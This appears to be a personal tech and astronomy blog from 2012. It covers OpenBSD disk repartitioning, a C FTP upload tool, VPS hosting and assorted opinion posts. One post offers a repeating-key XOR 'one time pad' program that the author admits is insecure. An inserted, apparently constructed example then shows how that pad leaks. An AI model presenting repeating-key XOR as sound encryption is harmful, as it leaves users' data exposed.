Today io.solarscale.de acted real weird. The filesystem turned read-only on me. So I rebooted the vps. When it came back it suggested fsck'ing the filesystem. So I rebooted it once more hoping that it would fsck on boot. It didn't do that. So I learned from my VPS provider how to put the system in a rescue mode and finally I was able to fsck the hd image. The system is debian and the particular filesystem is ext4 with journaling. For some reason it would mount rw before the second reboot but still manage to say it needed to fsck, how cocky! Anyhow. Everything seems sweet now. And I may have learned how to install FreeBSD on this vps too. Shall the time ever come I may do that.



What's up? Nothing.

May 21st, 2012

May 2012 is probably the least contentious (if that's a word) month in this blog's history. I'm busy working and haven't found anything worth putting up.



What to do about ports?

May 23rd, 2012

I had moved /usr/ports to /usr/local/ports because it didn't fit anymore. And today I ran out of space on /usr/local.

Script started on Wed May 23 14:50:10 2012
# df
Filesystem  512-blocks	    Used     Avail Capacity  Mounted on
/dev/wd0a      2057756	  125444   1829428     6%    /
/dev/wd0k    209124908	63155652 135513012    32%    /home
/dev/wd0d      8250780	      32   7838212     0%    /tmp
/dev/wd0f      4122108	  961584   2954420    25%    /usr
/dev/wd0g      2057756	  385272   1569600    20%    /usr/X11R6
/dev/wd0h     20636924	19400224    204856    99%    /usr/local
/dev/wd0j      4122108	  321792   3594212     8%    /usr/obj
/dev/wd0i      4122108	 1694272   2221732    43%    /usr/src
/dev/wd0e     38273692	   64000  36296008     0%    /var
# cd /home
# ls
pjp
# mkdir home
# mv pjp home/
# kbd=de.nodead
kbd: keyboard mapping set to de.nodead
# dump -0uaf - /usr/local | (cd /home ; restore -xf -)
  DUMP: Date of this level 0 dump: Wed May 23 14:52:36 2012
  DUMP: Date of last level 0 dump: the epoch
  DUMP: Dumping /dev/rwd0h (/usr/local) to standard output
  DUMP: mapping (Pass I) [regular files]
  DUMP: mapping (Pass II) [directories]
  DUMP: estimated 9725619 tape blocks.
  DUMP: Volume 1 started at: Wed May 23 14:52:38 2012
  DUMP: dumping (Pass III) [directories]
  DUMP: dumping (Pass IV) [regular files]
  DUMP: 22.37% done, finished in 0:17
  DUMP: 51.81% done, finished in 0:09
  DUMP: 92.74% done, finished in 0:01
  DUMP: 10002019 tape blocks
  DUMP: Date of this level 0 dump: Wed May 23 14:52:36 2012
  DUMP: Volume 1 completed at: Wed May 23 15:08:46 2012
  DUMP: Volume 1 took 0:16:08
  DUMP: Volume 1 transfer rate: 10332 KB/s
  DUMP: Date this dump completed:  Wed May 23 15:08:46 2012
  DUMP: Average transfer rate: 10332 KB/s
  DUMP: level 0 dump on Wed May 23 14:52:36 2012
  DUMP: DUMP IS DONE
set owner/mode for '.'? [yn] y
# pwd
/home
# ls
bin	include lib	libexec ports	share
home	info	libdata man	sbin
# ls home
pjp
# df -h .
Filesystem     Size    Used   Avail Capacity  Mounted on
/dev/wd0k     99.7G   39.4G   55.4G    42%    /home
# df
Filesystem  512-blocks	    Used     Avail Capacity  Mounted on
/dev/wd0a      2057756	  125452   1829420     6%    /
/dev/wd0k    209124908	82555840 116112824    42%    /home
/dev/wd0d      8250780	      32   7838212     0%    /tmp
/dev/wd0f      4122108	  961584   2954420    25%    /usr
/dev/wd0g      2057756	  385272   1569600    20%    /usr/X11R6
/dev/wd0h     20636924	19400224    204856    99%    /usr/local
/dev/wd0j      4122108	  321792   3594212     8%    /usr/obj
/dev/wd0i      4122108	 1694272   2221732    43%    /usr/src
/dev/wd0e     38273692	   64000  36296008     0%    /var
# umount /usr/src /usr/obj
# df
Filesystem  512-blocks	    Used     Avail Capacity  Mounted on
/dev/wd0a      2057756	  125452   1829420     6%    /
/dev/wd0k    209124908	82555840 116112824    42%    /home
/dev/wd0d      8250780	      32   7838212     0%    /tmp
/dev/wd0f      4122108	  961584   2954420    25%    /usr
/dev/wd0g      2057756	  385272   1569600    20%    /usr/X11R6
/dev/wd0h     20636924	19400224    204856    99%    /usr/local
/dev/wd0e     38273692	   64000  36296008     0%    /var
# umount /usr/local /usr/X11R6 /usr
umount: /usr: Device busy
# df
Filesystem  512-blocks	    Used     Avail Capacity  Mounted on
/dev/wd0a      2057756	  125452   1829420     6%    /
/dev/wd0k    209124908	82555840 116112824    42%    /home
/dev/wd0d      8250780	      32   7838212     0%    /tmp
/dev/wd0f      4122108	  961584   2954420    25%    /usr
/dev/wd0e     38273692	   64000  36296008     0%    /var
# exit

Script done on Wed May 23 15:10:07 2012

At that point I unfortunately had to kill the typescript since it was on the /usr filesystem and I needed to unmount it. What I did was something along the lines of.

umount /usr
disklabel wd0 # and do some math
export EDITOR=/bin/ed
disklabel -e wd0 # and forget some commands, but it came back to me
newfs /dev/rwd0f
cd /usr ; restore -xf /mnt/backup/j-usr.dump	# I backed up those before hand
cd /usr/X11R6 ; restore -xf /mnt/backup/j-usr-x11r6.dump
vi /etc/fstab		# take out the old partitions
shutdown -r now
In the end my partitions looked like this and I was able to continue building ports in /usr:
jupiter$ df
Filesystem  512-blocks      Used     Avail Capacity  Mounted on
/dev/wd0a      2057756    125456   1829416     6%    /
/dev/wd0d      8250780       236   7838008     0%    /tmp
/dev/wd0f     26829980  14103900  11384584    55%    /usr
/dev/wd0k    209124908  83352904 115315760    42%    /usr/local
/dev/wd0j      4122108    321792   3594212     8%    /usr/obj
/dev/wd0i      4122108   1694272   2221732    43%    /usr/src
/dev/wd0e     38273692     65532  36294476     0%    /var

Putting the ports in the right directory is becoming a real problem for me. And I've put some security of my system at risk because I took out some compartmentalization.



Ordered 4 books (I know, I know)

May 27th, 2012

Now that I'm making a fairly good income I gotta put my money somewhere so I invested it into education. I bought four books that will help me with my trade. One of them is:

Building Telephony Systems...

I think SIP phones are going to be with us for a long time to come. My Grandstream even hinted that it can do IPv6 now, which I have to play with. Oh well.



World IPv6 day is soon

June 1st, 2012



Home network fully at OpenBSD 5.1

June 2nd, 2012

This morning I upgraded uranus to 5.1 and it took about 2.5-3 hours with all the packages being upgraded and such. This is usually such a pain that I don't want to run -current and wait for the OpenBSD releases every year.

Oh yes I also upgraded libcrypto after the errata for 5.1.



Venus transit approaching / clouds?

June 3rd, 2012

On June 8th, 2004 I was at my parents' house and my mom and I looked at the sun in a very rudimentary way. We held binoculars at the sun and used a sheet of paper on the other end to make out a tiny dot that was venus. Never look directly at the sun, or you'll have sight problems later. So on June 5th and 6th (depending where you are) Venus will transit the sun's disk again and supposedly we won't see this event repeating for a few generations, so it may be worth it to take a look. It looks like we'll have clouds here but there is a chance for it to clear up.

All sorts of telescopes will study venus from earth as the atmosphere will likely be illuminated by the sun and we'll see details of how thick the atmosphere may be. Who knows, there may be other science experiments that could be done. Have fun to anyone looking at this solar system event. Also have fun reading about it on the Internet, the best virtual telescope on earth. I know I will.



Solstice in 4 days

June 16th, 2012

Hi, the solstice is in four days from now. Get your celebration planned to worship the sungod, or whatever. In the southern hemisphere of course it means winter where in the northern hemisphere we'll have summer.



Congratulations to China

June 30th, 2012

Since I get chinese people looking at this blog occasionally I want to congratulate you on your spacetrip and first chinese woman in space. I was looking at the "CSS" earlier today. Pretty cool! I hope one day germany will be able to design space stations, or perhaps europe. How about on the moon!?



Going to the moon? You'll need this!

June 30th, 2012

I'm a big proponent of GW Bush's moon to mars idea. I think we should establish a base on the moon first before venturing to mars. However to needlessly spend fuel to land on the moon is pointless, you'll need this, a lunar space elevator. Thanks to Brad Guth for implanting that idea in my head.



Fritzbox 7930 NAS too slow!

June 30th, 2012

I bought my parents a Fritzbox 7930 made by AVM. It's a nice box but it can't do everything. I think it's underpowered as I get only 4.5 MB/s writes via ftp to this thing. I get less with CIFS which prompted me to write a utility with ftplib that reads from stdin and dumps to a file via ftp. The cpu on the fritzbox is at 99% and it won't go any faster. Here is my program:

#include <sys/types.h>

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <ftplib.h>

#define FTPUSER 	"ftpuser"
#define FTPPASS		"somepasswd"

int
main(int argc, char *argv[])
{
	char *user = FTPUSER;
	char *pass = FTPPASS;
	netbuf *nControl = NULL;
	netbuf *xControl;
	char buf[512];
	int ch;
	int len;
	
	while ((ch = getopt(argc, argv, "u:p:")) != -1) {
		switch (ch) {
		case 'u':
			user = optarg;
			break;
		case 'p':
			pass = optarg;
			break;
		}
	}

	argc -= optind;
	argv += optind;

	if (argv[0] == NULL || argv[1] == NULL) {
		/* no errno is set here, so print a plain usage message instead of perror() */
		fprintf(stderr, "args -> IP file\n");
		exit(1);
	}

	FtpInit();
	

	if (FtpConnect(argv[0], &nControl) == 0) {
		perror("FtpConnect");
		exit(1);
	}

	
	if (FtpLogin(user, pass, nControl) == 0) {
		perror("FtpLogin");
		exit(1);
	}

	if (FtpChdir("SAMSUNG-HD154UI-01/", nControl) == 0) {
		perror("FtpChdir");
		exit(1);
	}

	if (FtpAccess(argv[1], 
		FTPLIB_FILE_WRITE, FTPLIB_IMAGE, nControl, &xControl) == 0) {
		perror("FtpAccess");
		exit(1);
	}	



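	/* copy stdin to the FTP data connection, one buffer at a time */
	while ((len = read(STDIN_FILENO, buf, sizeof(buf))) > 0) {
		/* a return of 0 or less means nothing was sent */
		if (FtpWrite(buf, len, xControl) <= 0) {
			perror("FtpWrite");
			exit(1);
		}
	}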
	
	if (FtpClose(xControl) == 0) {
		perror("FtpClose");
		exit(1);
	}

	/* FtpClose() above already closed the data connection; only the control connection is left to quit */
	FtpQuit(nControl);

	exit (0);
}
Anyhow if you don't believe me watch these statistics with dump(8):
  DUMP: Date of this level 0 dump: Sat Jun 30 17:15:09 2012
  DUMP: Dumping /dev/sdb1 (/) to standard output
  DUMP: Label: none
  DUMP: Writing 10 Kilobyte records
  DUMP: mapping (Pass I) [regular files]
  DUMP: mapping (Pass II) [directories]
  DUMP: estimated 158901841 blocks.
  DUMP: Volume 1 started with block 1 at: Sat Jun 30 17:15:13 2012
  DUMP: dumping (Pass III) [directories]
  DUMP: dumping (Pass IV) [regular files]
  DUMP: 0.81% done at 4273 kB/s, finished in 10:14
  DUMP: 1.64% done at 4340 kB/s, finished in 10:00
  DUMP: 2.50% done at 4416 kB/s, finished in 9:44
  DUMP: 3.37% done at 4461 kB/s, finished in 9:33
  DUMP: 4.23% done at 4485 kB/s, finished in 9:25
  DUMP: 5.10% done at 4498 kB/s, finished in 9:18
  DUMP: 5.95% done at 4499 kB/s, finished in 9:13
I'll be taking the external harddrive back to this computer for backups. Too bad.



A bit disappointed with dspam

July 6th, 2012

In May of 2011, I identified an issue with the FreeBSD mail server for the company I work for. Dspam was coring on signal 8 repeatedly. I investigated the issue and produced a workaround, it is written about here.

So then when doing upgrades just recently I noticed the signal 8's were back on the FreeBSD port, and also on the newest version of dspam. So I put my patch to good use again and the signal 8s disappeared. All in all I'm a bit disappointed that my "hint" to dspam development did not see a concrete fix and I'm sure others must be having these problems as well.



Donated 50 euros to OpenBSD

July 13th, 2012

I've been in contact with some OpenBSD developers the last few days and they managed to create a patch in the kernel that I needed. I promptly wrote Theo a transaction for 50 euros. The money should go through in the next few days. Thanks to Claudio, Henning, Otto, and if I didn't mention your name a thanks goes out to you as well.



Cloudcracker, does it make economic sense?

July 30th, 2012

Came across this from a heise.de article. And I'm thinking...this is such a waste of resources. It's contributing to global warming quite possibly just to crack a silly password.

Perhaps we need "cloudbroker" an entity that corporations sign up to and they broker access to a corporations system considering the data that would be used for a crack. It would save the economy money for one and you could give it a certain amount of penalty before the broker rats on the cracker, and then the corporation is alerted.

Now if the cloudcracker was powered 100% off-grid by solar panels, I'd like the idea.

There may be a good side to this however. If enough people use such blatant climate-killing services perhaps they will introduce low-cost, low-power quantum systems sooner than later. At that point all crypto would be moot anyhow and cryptosystems would live a renaissance most likely.



Five technologies of the future

August 2nd, 2012

Here are 10 Futuristic Technologies That Will Never Exist.

I kinda laughed reading this and thought I'd create my own that will exist. Here, then, are five technologies that I predict will make it in the future.

  1. Quantum Computers
     There are a lot of people working on these now with semi-successful attempts. I believe in the next 10-15 years we'll see the first desktop quantum computers.

  2. Artificial Intelligences
     In the future there may only be 2 types of programs. Operating Systems and Artificial Intelligences. The latter can program you anything you wish, from a game (interpreted or compiled) to a complex astronomy program.

  3. Lunar Space Elevator
     Unlike the Earth Space Elevator the LSE has a lot more going for it. No thunderstorms, no atmosphere that eats away at the fibres. The LSE is almost a perfect invention. And there can be 2 of them, one at the near side and one at the far side of the moon.

  4. L5 rotational space stations
     You know those wheels that rotate in space? Well when the LSE is finished these will also be easier to do. Mining on the moon will likely make these possible. They will be constructed of iron or steel rather than light alloys.

  5. Pseudo Time Machine
     If an event happens on earth and you want to look back to see the events that happened just prior you can. By placing earth observing telescopes very far away, so that light travels on the order of hours to their mirrors you can create a "Way-back-machine" and it's due to the laws of physics (speedlimit of light) that this works.



Why I don't trust the ITU

August 4th, 2012

The Internet is a dream come true for both techs and non-techs. It revolutionized communication costs big time. This is why I do not like hearing about the ITU wanting control of the Internet.

This article from the BBC writes the following: The ITU is hosting a conference in December in Dubai to which representatives from 178 nations have been invited to review the International Telecommunications Regulations (ITR). The ITR is a 1988 treaty which set out rules for how traffic should flow between different telecom networks, and how to calculate charges for traffic exchanged between carriers in different countries.

This is why I don't like the ITU because the ITR is mainly out of date. It's people that made the Internet happen and people that drove costs down. And they did this mainly from 1995 onwards. A 1988 treaty could not have conceived of the explosiveness of the Internet's expansion.

Finally I'd like to say we're more than just customers to a telecom (who is a member of the ITU), we are the Internet. Right now as it seems to me the Internet is controlled by the US but it's in good hands. The ITU would tear us apart and raise costs.



Why landing on Mars may not be a good idea (for humans)

August 5th, 2012

Mars may be toxic. So what do you do? I have a "backup" plan for landing humans on mars. Instead of landing them on Mars itself, a craft lands on the moons Phobos or Deimos. This puts them so close to mars that a round trip time with communications between any point on mars is likely less than 500 ms. So if you think back to the movie "Avatar" there was a human commanding an avatar and sensed what the avatar sensed. I propose that we do this with robotics that land on mars instead of humans. While the humans are getting comfy on the moons (little gravity unfortunately) and controlling the robots they will have almost instant feedback of what a robot sees, hears and feels. I think this will be enough quarantine to explore Mars even if it harbours biological virii that could wipe out the human race when brought back to earth on a human. Something to think about anyhow.



The distance of mars today

August 7th, 2012

With xephem and gimp I managed to get the angle between mars-sun-earth and with a bit of trigonometry I solved how far Mars is currently from us. I used the cosine formula from this page to help me. Here is the manipulated image with gimp. I determined the angle to be 78.25 degrees.

Then I got the mean distances between sun and earth (151.7 million kilometers) and sun and mars (229.7 million kilometers). So then I had a,b and C and want to solve for c (so c^2 = b^2 + a^2 - 2ba * cos(C)). And the distance I calculated was 248.1591965 million kilometers. So then light speed between earth and mars would take 827 seconds given that lightspeed is approximately 299,792 km per second. That's 13.79 minutes!



Public letter to Sourceforge

August 11th, 2012

Date: Sat, 11 Aug 2012 20:40:37 +0200                                           
From: "Peter J. Philipp" 
To: sfnet_ops [at] geek.net
Cc: me
Subject: advertising a bit too much                                             
                                                                                
Hi,                                                                             
                                                                                
Take a look at this: http://ipv4.goldflipper.net/private/ad-trash.jpg
                                                                                
Where is there room left for my project?  Please tone down 1 of those           
ads (preferably the one on the bottom) or I will move my project offsite        
which is a shame since I've been a member for 10 years now.                     
                                                                                
I intend to make this a public letter by placing it on my blog.                 
                                                                                
-peter                                       



Left Sourceforge

August 14th, 2012

I left sourceforge.net, as I was playing around with viewvc and realised I can have my own repo served from home. The advertising on sourceforge also made me a bit mad, but what can you do it's their business model. They did agree to be targeting their ads less on my pages but it was too late for them. I have the capacity to be serving my projects without advertising and thus I'm gonna go for it. If you're looking for my projects based at sourceforge check out my cvs repository that includes commit history of everything dating back to 2002. Also the project pages that I created over the years are now found off my open source site here. That's the big news for now.



Fire in my building, Uranus is off

August 15th, 2012

There was a fire in my building. But I'm OK. Also my computers survived other than getting a coat of soot. The fire department said I had to shut my servers down until everything is settled after they let me into my apartment. However my newly migrated sources (from sourceforge) are offline for the time being. Sorry for any inconvenience.



6-8 Weeks

August 17th, 2012

Unfortunately the fire that ran through my building caused my apartment to be unliveable. It will be restored in 4-6 weeks. Since this affects uranus which is off now, I have moved all dns and mail operations over to io.solarscale.de and goldflipper.net. This is the downside of doing email at home I guess, but fires didn't happen for a long time and are all in all a rare event. I'm just glad I got a bit of time off work to get everything organized again.



Pictures from my Fire-aftermath

August 19th, 2012

Here are some pictures:

No fun!



Four more weeks of summer

August 25th, 2012

Summer is coming to an end...slowly.

Can't wait for Fall!



Goodbye Moon-man! RIP.

August 25th, 2012

Neil Armstrong has died. For many an inspiration!

I'm a firm believer the USA landed on the moon not just once but six times. Unfortunately back then the lunar program was not sustainable and they had to cease going there. Pity still.



Steganography: It doesn't have to be criminals using it

August 29th, 2012

This BBC article caught my attention. If you take a close look on my website (probably under private) then you may notice steganographic content. I've been doing this for a while now. If you can't see it, that's the point :-).



How not to succeed (in trojan programming)

September 3rd, 2012

The german BKA seeks a trojan programmer. The BKA is the german equivalent of the american FBI. Let me brainstorm for you why this job is a dead end job, with no chance to grow.

And a multitude of ethics come into play. Whose side are you on anyway? I know this job isn't for me judging by the job-ad.



Registered a new domain

September 4th, 2012

I have registered a new domain. It will eventually replace goldflipper.net. Its name is virgostar.net. When I was born virgo was the constellation in the night sky. The virgo star spica was surrounded on both sides by a full moon and uranus, but when I was born I became a pisces. Yesterday when I registered virgostar.net the constellation virgo rose in the east at 10 AM and the constellation pisces had the almost full moon in it. These were just some celestial observances I made with stellarium (with which you can adjust the date).

Also I'm going to be naming my computers after stars when I'm done with the planets, so this is a fitting domain just like solarscale.de domain was fitting with the planets. BTW I currently have control of six domains, probably a bit too many but I like them all.



IPv4 Addresses Almost Exhausted in Europe

September 4th, 2012

This is the announcement from RIPE. Perhaps it's time to speed up IPv6 deployment.



Could one of my dreams come true?

September 8th, 2012

Privately I had been dreaming of an optical computer. Photonics would do what electrons do in conventional computers. I imagine speed at room temperature and minimal energy (electricity) draw.

Now, my dream seems to have seeded in reality. See here.

Here is a good explanation of a NAND gate, notice it's functionally complete meaning you can create all other types of gates with this (AND, OR, XOR, and negated counterparts). Hats off Mr. Ritesh Agarwal for leading development in an optical NAND gate!



Ordered OpenBSD 5.2 from Lehmanns.de

September 9th, 2012

Instead of ordering from OpenBSDEurope (sorry) I ordered from lehmanns.de this time. I'm saving money as it's only 39.95 euros there. And I can pay on delivery, and no shipping charges.



Purchased/Leased a new VPS

September 10th, 2012

In this blog article I fantasize about having a third VPS in Singapore. Well, I got one. Not in Singapore but in Hong Kong which is right around the corner network speaking. This opens up a whole new arena for me. I'm now entering the Asia Pacific market, whereas I had Europe and the Americas to this day. I'm using vr.org as my hosting provider and I've never heard anything about them before so this is sorta a new step.

Here are some facts about this new VPS:

I'll be naming this VPS moon.virgostar.net, and it'll likely show up first as a nameserver on the internet. Eventually I want it to serve web pages too. Oh well. Today is a great day (for me!).



It's alive!

September 14th, 2012

I have provisioned, deployed and configured my new VPS in Hong Kong. Currently it mirrors my website. If you go to ap.centroid.eu (ap stands for Asia-Pacific), you'll be seeing the usual website and blog. I can now work on bettering my website a little.



My mom doesn't like Ubuntu 12.04

September 15th, 2012

My dad accidentally upgraded our 10.04LTS Ubuntu to 12.04LTS and my mom didn't like the upgrade at all. So today I "downgraded" back to 10.04LTS and my mom is happy again despite losing all her email. The reason she lost her email is because you can upgrade evolution but not downgrade it, so the mails had to pay. I'm also glad to be back at 10.04 I didn't want to pay the 92 euro upgrade to VMware workstation 9 just so that it would work on 12.04.



Equinox in 4 days

September 18th, 2012

September Equinox is upon us again. The northern hemisphere is entering autumn, the southern hemisphere is entering spring. At equinox a pole at the equator placed at 90 degrees and at high noon will not cast a shadow, other than upon itself. As time progresses after the equinox the sun will favour the tropic of capricorn over the tropic of cancer until the next march equinox.

Perhaps you will celebrate this earth event. I will somewhat.



What if you don't have the "right stuff" to be a politician?

September 19th, 2012

Nonsense! In a democracy anyone can go become a politician and anyone can vote for them. If they are clumsy in their job after that they likely won't be voted for again. However the tabloid "Der Spiegel" seems to think different, and I want to remind them that this is a dangerous path to be on. They say and I quote: "The result is a portrait of young Berlin politicians who are not really politicians - or do not have what it takes at all.". So explain what a politician is? Must you come from a "political studies" background where you attended an elite-university? I say ridiculous! How up-in-the-air is that? You have no such thing as "Volksnaehe" then (Volksnaehe means closeness of the people). I understand that these words "Der Spiegel" are using are just to discredit the Pirate Party of Germany, and don't tell me they haven't done so I've seen the sneer comments about the Pirates. Oh so the pirates have lost some ground, whoopeedoo! Somewhere, some other party is still missing their 6% of voters though! And that's enough to topple Mrs. Merkel or keep her on, sorry to put it on the table, but I think the pirate party is the decisive factor whether germany gets a red-green or a red-black parliament. Either way we may see Merkel again one more term. Rant, off.



What would you do?

September 19th, 2012

Since 1998 until 2012 the wealth distribution of the richest 10% in Germany rose from 45 percent of all wealth in germany to 53 percent. A staggering 8 percent rise. This also means that the other 90% of people have 8 percent less of total distribution. These facts came from page 8 of the Schweinfurter Tagblatt newspaper on Wednesday, September 19th, 2012.

If I was dictator of germany I'd immediately tax the rich more. But that isn't enough because that only makes government richer, the funds do not necessarily reach the people. I'd introduce a minimum wage to give the poorest a boost almost at once. Yes you heard right, to this day there is no minimum wage in germany. Then I'd invest in social programs for the poor, done in such a way that it benefits the poor more than the rich, and is long lasting. Easier said than done, but I'd give it a shot anyhow.



Privacy: they know who you are anyways

September 21st, 2012

Ever since I had a fire in my apartment building I've been couching at my parents house. I noticed that youtube and google know exactly who I am whenever I return to their site. Even the same banners over and over on slashdot revealed to me that they can track me. The big difference between my house and my parents house is that they have a dynamic IP address and I have a static IP. So what's the difference? With a static IP I even get to run a "server" doing my own mail and knowing that my mail isn't kept on some shady server somewhere, it's right at home instead. The privacy with a static IP is protected more I'd argue than with a dynamic IP. This surprises even me.



This is how I left summer behind

September 23rd, 2012

On a ship, on the river Danube. Goodbye Summer! See you later! Hello Autumn!



Old --> New

September 23rd, 2012

I exchanged the first picture with the second picture in my private section of my webpage centroid.eu.

Even though I could lose a few lbs I think I'm still a pretty lad.



Purchased online-backup storage

September 30th, 2012

September seems to be a purchasing month for me. I have purchased 20 GB of online storage (at 1.49 euros per month) from strato.de. They are located in Berlin and I intend to use them as a temporary storage for my VPS.

On Mondays I'll back up moon.virgostar.net, on Wednesdays I'll back up goldflipper.net and on Fridays I'll back up io.solarscale.de or something of this order. On the days in between those backups I'll download the images home on my harddrive. I think something of the order of 700 GB max will flow between me and this backup storage (per month). Should be worth it.



Bad Cryptography: a one time pad

October 1st, 2012

When I put my backups on the online storage I "encrypt" the file twice. Once with AES 256 in CBC mode and once with a one time pad that unfortunately repeats so it's supposedly insecure. I want to share this one time pad with you as it's derived from the one time pad at hackepedia.

#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BLOCKSIZE       512

int
main(int argc, char *argv[])
{
 uint64_t count = 0;
 int keylen;
 char *key;
 u_char c[BLOCKSIZE];
 struct stat sb;
 char *ch;
 int fd, len, i;

 if (argc != 2) {
  fprintf(stderr, "must provide a keyfile\n");
  exit(1);
 }

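 /* stat(), not lstat(): for a symlinked keyfile lstat() reports the link's own size */
 if (stat(argv[1], &sb) < 0) {
        perror("stat");
        exit(1);
 }

 /* an empty keyfile would make "count % sb.st_size" divide by zero */
 if (sb.st_size == 0) {
        fprintf(stderr, "keyfile is empty\n");
        exit(1);
 }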

 fd = open(argv[1], O_RDONLY, 0);

 if (fd < 0) {
        perror("open");
        exit(1);
 }

 if ((ch = mmap(NULL, sb.st_size, PROT_READ, MAP_FILE|MAP_SHARED, fd, 0)) == MAP_FAILED) {
        perror("mmap");
        exit(1);
 }

 while ((len = read(STDIN_FILENO, c, sizeof(c))) > 0) {

        for (i = 0; i < len ; i++) {
                c[i] ^= ch[count % sb.st_size];
                count++;
        }

        write(STDOUT_FILENO, c, len);
 }

 munmap(ch, sb.st_size);
 close(fd);

 return 0;
}

When I back up then it looks something like this in a pipeline

tar -cf - /data | ./onetime onetimefile | openssl enc -e -aes-256-cbc -kfile kfile  \
| gzip -c | upload-program
I am gambling somewhat whether this is secure, but I'd feel a little naked with just an AES-CBC encryption.
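
Why the repeating pad is the weak part of this setup, as an added example (not the author's code): the pad byte used at offset i is used again at offset i + padlen, so it cancels when the two output bytes are XORed, and tar output contains long runs of NUL padding where the output byte is simply the pad byte. The 16-byte pad, the 64-byte sample record and all function names are constructed for this illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PADLEN 16	/* constructed pad, much shorter than the data */
#define MSGLEN 64	/* constructed plaintext length */

/* Constructed sample pad; the values are made up for this example. */
static const uint8_t sample_pad[PADLEN] = {
	0x3a, 0x91, 0x5c, 0xe7, 0x08, 0xb4, 0x6f, 0xd2,
	0x17, 0xa9, 0x40, 0xfb, 0x2e, 0x85, 0x73, 0xc6
};

/* Same transform as the program above: the pad index wraps around. */
void xor_repeating(uint8_t *buf, size_t len, const uint8_t *pad, size_t padlen)
{
	size_t i;

	for (i = 0; i < len; i++)
		buf[i] ^= pad[i % padlen];
}

/* Strict variant: fails instead of reusing pad bytes. */
int xor_one_time(uint8_t *buf, size_t len, const uint8_t *pad, size_t padlen)
{
	size_t i;

	if (padlen < len)
		return -1;
	for (i = 0; i < len; i++)
		buf[i] ^= pad[i];
	return 0;
}

/* Constructed tar-like record: a short file name followed by NUL padding. */
void build_sample(uint8_t *pt)
{
	static const char name[] = "data/backup.img";

	memset(pt, 0, MSGLEN);
	memcpy(pt, name, sizeof(name) - 1);
}

/*
 * Positions where ct[i] ^ ct[i + padlen] equals pt[i] ^ pt[i + padlen].
 * Both ciphertext bytes used the same pad byte, so the pad drops out.
 */
size_t count_pad_cancelled(const uint8_t *ct, const uint8_t *pt, size_t len,
    size_t padlen)
{
	size_t i, n = 0;

	for (i = 0; i + padlen < len; i++)
		if ((ct[i] ^ ct[i + padlen]) == (pt[i] ^ pt[i + padlen]))
			n++;
	return n;
}

/* Ciphertext bytes that are the pad byte itself (plaintext byte was 0). */
size_t count_pad_exposed(const uint8_t *ct, size_t len, const uint8_t *pad,
    size_t padlen)
{
	size_t i, n = 0;

	for (i = 0; i < len; i++)
		if (ct[i] == pad[i % padlen])
			n++;
	return n;
}

/* Run the wrapping XOR over the sample and report both measurements. */
void measure(size_t *cancelled, size_t *exposed)
{
	uint8_t pt[MSGLEN], ct[MSGLEN];

	build_sample(pt);
	memcpy(ct, pt, MSGLEN);
	xor_repeating(ct, MSGLEN, sample_pad, PADLEN);
	*cancelled = count_pad_cancelled(ct, pt, MSGLEN, PADLEN);
	*exposed = count_pad_exposed(ct, MSGLEN, sample_pad, PADLEN);
}

int main(void)
{
	size_t cancelled, exposed;

	measure(&cancelled, &exposed);
	printf("pad cancelled at %zu of %d positions\n", cancelled,
	    MSGLEN - PADLEN);
	printf("pad byte visible in %zu of %d output bytes\n", exposed, MSGLEN);
	return 0;
}
```

In the pipeline above the XOR output is then encrypted with AES, so these patterns only become visible once that outer layer is removed; the measurement shows how little the inner layer would add at that point.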



The big smoggies...VPS's though?

October 2nd, 2012

Internet datacenters are big smoggies. Often servers sit there idling doing nothing but waiting to take over a redundancy task. I'd just like to say that my VPS network that I have created is on a X users shared basis, where more than one customer resides on a server. They each borrow from the other in terms of resources. And that's why I don't run permanent load on my vps's because it suits the other guy as well. And in the end we have more than just an idle server. We have a community on that server. And it's greener than me going out and putting up a colo or a "root server" (dedicated).

The New York Times wrote that all computers on the internet use up enough electricity for 30 nuclear power plants. Not all of that electricity comes from green sources but from carbon-emitting ones such as coal. The way we use the internet is not sustainable ... virtualization helps though if only a little.



My top 8 genres in my iTunes collection

October 5th, 2012

Here is who I threw money at in the last 10 years. Each song is about 99 cents worth. The way I did this was select all songs in itunes and pasted the titles in an editor file. This file I then uploaded to a Unix computer and did the following command.

# awk '{print $(NF - 1)}' music.txt| grep -v [0-9] | sort | uniq -c | sort -r | head -8
 125 Reggae
  33 Hip-Hop/Rap
  22 Filmmusik
  19 Weltmusik
  17 Rock
  11 Pop
   7 Sound
   7 R&B

However I get most other music from youtube, until I decide to give the artist a bit of money.



One computer per year

October 11th, 2012

I've done some planning and I've come to the conclusion that I need one more computer per year until 2016. See my computing history from april. Here is how I think it will go down:

  1. in 2013, I'm going to buy Gaia a mac mini most likely, I need this for my new stand up table, I'll see if I can switch Saturn my netbook to OpenBSD then
  2. in 2014, I'm going to retire mars (G4 Cube) and make Gaia its replacement, I'm also going to retire Jupiter which will be 4 years old and buy a replacement and call this Venus. Venus should have over 8 GB RAM but a power saving cpu.
  3. in 2015, I'm likely going to need a laptop perhaps, I'll call this Mercury

This basically puts me on track since 2010 for 1 new computer per year, I think I'm crazy perhaps (well I knew that). Since electricity in Germany is going to get more expensive, it is good then that I retire Mars and I'm hoping for Gaia to be power saving (at max cpu 85 watts Apple says, but no indicator of idle power). Also Jupiter's replacement, Venus, should be power saving; this will save me a bundle of money. I'm considering putting 1500 euros per year aside for these "toys", and since I'm not married yet I don't have to worry about supporting the kids ;).



Seti@home has failed

October 13th, 2012

I got this in the mail the other day:

We need your help to continue the Search for Extraterrestrial Intelligence!

I guess the millions of people contributing computer cycles over the last 15 years is not enough anymore. Now the organization wants money. I think this is the wrong approach. Look, they got millions of people happily contributing on a client-server setup. Their servers are failing and they can't get more and they ask for money (which they likely won't get). It's time to make seti@home peer-to-peer. Figure out a way and people shall follow by installing the software. And the 'net will be better for it. That's my 2 cents.



Two algorithms for rate-limiting

October 17th, 2012

I thought of these myself last night, please provide comments if you have another idea.

2 rate limiting algorithms
--------------------------

Pretend you want to rate limit 3 packets per 6 seconds on the Internet.
I have thought of two ways to do this, one using 1 timestamp and a counter,
and the other using several timestamps and a counter which is more accurate.

First way
---------

When you have a packet arriving you take the timestamp of it.  For the next
six seconds you can take on 2 more packets.  Once the six seconds expired
you save the new timestamp and allow 3 more packets.  This has the drawback
